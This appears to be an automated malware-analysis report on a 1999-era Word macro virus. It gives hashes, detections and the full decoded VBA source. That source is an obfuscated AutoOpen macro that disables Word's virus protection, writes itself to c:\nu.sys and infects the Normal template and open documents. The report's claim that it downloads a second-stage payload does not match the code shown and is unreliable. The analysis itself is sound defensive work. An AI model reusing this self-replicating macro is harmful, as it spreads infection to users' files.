Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6562e807db74bb4a…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 30.5 KB
Created: 1999-06-20 16:28:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 155305cbefb417e604f264d5b80c8b7f
SHA-1: 9d19e4297bbd5bdfbee92a58ff0cbb8d65b879fd
SHA-256: 6562e807db74bb4a159215dfd71a7b46a2123880393eed70732a8d6d4f092036
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro. The macro obfuscates its own code and appears designed to download and execute a second-stage payload, as evidenced by the reconstructed path 'c:\nu.sys', which is likely used to store the payload. The presence of the AutoOpen macro and the nature of the payload suggest the document was delivered as a spearphishing attachment.

Heuristics (4)

  • ClamAV: Doc.Trojan.Bleed-4 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Bleed-4
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8539 bytes
SHA-256: 269b63b17076cfbdf6f322fd56c405536daa1bf906e1cb206797095d6a5c35d6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Crypted"
Sub AutoOpen(): Dim jack(13)
jack(1) = "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
jack(2) = "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷ݶÉÌ: c Àêµñ= ßÉç""AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë """"CrÊy½pt¸òeÒdÞ´íʹ"""""
jack(3) = "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
jack(4) = "Optiàons.Sa¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ Falùпse"
jack(5) = "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProŸ¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents(""CrºÌypàtedÔ¾Ñóø""ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdܼûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
jack(6) = "Ope¾ÜöÙðÎn ""cËÓíͶê:ì\nÛÚÜ´ÍuÅô.sysÝ"" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1"
jack(7) = "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËοmplúÉæatÝæe.VBPßroÑ÷Èjectí.VBü̶çÆCo÷Îþ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts(""CrypteÇ´dûÉùÎ""Åùèâ).NÝÔaÑïÇçme) ¼ÇÌ¿ö½= 0 ÝThe¹ÅòÌÈÀnÊ× NîÀormaõÜßöl츾Temp¼ÀæÃÊlate.VBÙÌåýßÖPrºæÛ뺽oject.¸ïVBCÜéo¼ÓÚmëøponents.ññîëImport Àû¾ëúä""c:ËÖ\nu.º×ÛÊsys"""
jack(8) = "I¾þÌèÃÐf LeníñóêÛ(ActiçvÒÝçâçeD̾×ÀóoÆücumëÐäeÄÕÜnt.VBõûãÁñProject.VBCo¼÷¾ÍÝmpoîØôòüÛnentsç¾¼éá(""C¾rèàÙßÄyptÝÏÇõÊüed""ØîÈ).Name)èïÏÂù = îäÂô0 ÓThenÍïÌÝì Actü¸×ÁüÕivíeåÚçDîoùÇcument.ÇÆVBProjôëØÔ¾eïÚÒ¸ÖcéÀ÷t´ðöï.óëÖVóòãíÑBComponenóÙäøöÀtÇÙÒïsÙáÂÊéË.Impüò»Øort ""c:ô½Ú\nu.syʼÜüs"""
jack(9) = "ThisDüÇocumeÛênt¿.VÌüÚBPrôoµÖject.VBCompoçåènenÆÖÉ×ètÝÛ˹Üs(""CãÑÄÈrÄÛ̵êyøptÞçöÁed"")çÌüæëï.CµÀodeMåèüÎëodule.DeÐûáÎßõlÿeteLinæÆ½Åes þìáÃË26, 9½´Ô"
jack(11) = "If AñÝ¿êÒÜctÐiveæîæéÔàDocößóumentÊ.SavàeüÕÊÅüüd =Òé F¹åalse ×½äTרëÑh¸Àßúßóen AcÇèóïÊtàivþº´åÊÃeDùØëµãocumºØe½ÜÈnt.SaveAs ActíÑiveDïàÓÞÎoçÄàcÞÉáÚÄçuìmçÑÜ÷êÞent.ÑîÉãÝÆFulÓÀlName»àÔÅù"
jack(10) = "TÌìhñµisDûýûoÌÊñ´ýücumðñîÕ¸ÑenÝtµÝá¶Ïß.Ô»¾ÚÀùVBPËÁ¼ï¿roÍjeÏÓÕñÀËct.ÛÌüÔÂÛVBCoþ½ÏmpÜиçðËoneÚðÝÆ´Ünts(""ζúCÖryöýè¾Ð¹ptÛedÌ»ö"").êã¼ßéCodeMìóü¿ÝodîÊÒ÷Ûulãêå¶ûe.DeäÈÁleteÃLineÆs 26޵ƻ,ʽ¸ñ 4"
jack(12) = "AcÍùðÑòÖtÍivÊËeÁDocuÒýÚêmùݸÖeÅåÆÕnµÉ¹´têÞç´.èõæClosÒe wdãñîó»DêÌoNotîääñÜSÎaÓveCÔÑhanã×geåÜçÙs"
jack(13) = "End ïÕØSÕ¹ÓÊuËüöÖàÄb"
For i = 1 To 13
    For ii = 1 To Len(jack(i))
        z = Mid(jack(i), ii, 1)
        If Asc(z) > 177 Then z = ""
        x = x & z
    Next ii
    vc = vc & x & vbCr
    x = ""
Next i
ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 26, vc
End Sub

' Processing file: /opt/analyzer/scan_staging/3e7ff5cae6314a238a01288919e8c5e8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Crypted - 5472 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' 	BoS 0x0000 
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x000D 
' 	VarDefn jack
' Line #1:
' 	LitStr 0x0022 "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
' 	LitDI2 0x0001 
' 	ArgsSt jack 0x0001 
' Line #2:
' 	LitStr 0x007B "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷ݶÉÌ: c Àêµñ= ßÉç"AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë ""CrÊy½pt¸òeÒdÞ´íʹ"""
' 	LitDI2 0x0002 
' 	ArgsSt jack 0x0001 
' Line #3:
' 	LitStr 0x003D "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
' 	LitDI2 0x0003 
' 	ArgsSt jack 0x0001 
' Line #4:
' 	LitStr 0x003D "Optiàons.Sa¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ Falùпse"
' 	LitDI2 0x0004 
' 	ArgsSt jack 0x0001 
' Line #5:
' 	LitStr 0x00A6 "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProŸ¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents("CrºÌypàtedÔ¾Ñóø"ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdܼûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
' 	LitDI2 0x0005 
' 	ArgsSt jack 0x0001 
' Line #6:
' 	LitStr 0x009C "Ope¾ÜöÙðÎn "cËÓíͶê:ì\nÛÚÜ´ÍuÅô.sysÝ" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1"
' 	LitDI2 0x0006 
' 	ArgsSt jack 0x0001 
' Line #7:
' 	LitStr 0x0102 "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËοmplúÉæatÝæe.VBPßroÑ÷Èjectí.VBü̶çÆCo÷Îþ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts("CrypteÇ´d
... (truncated)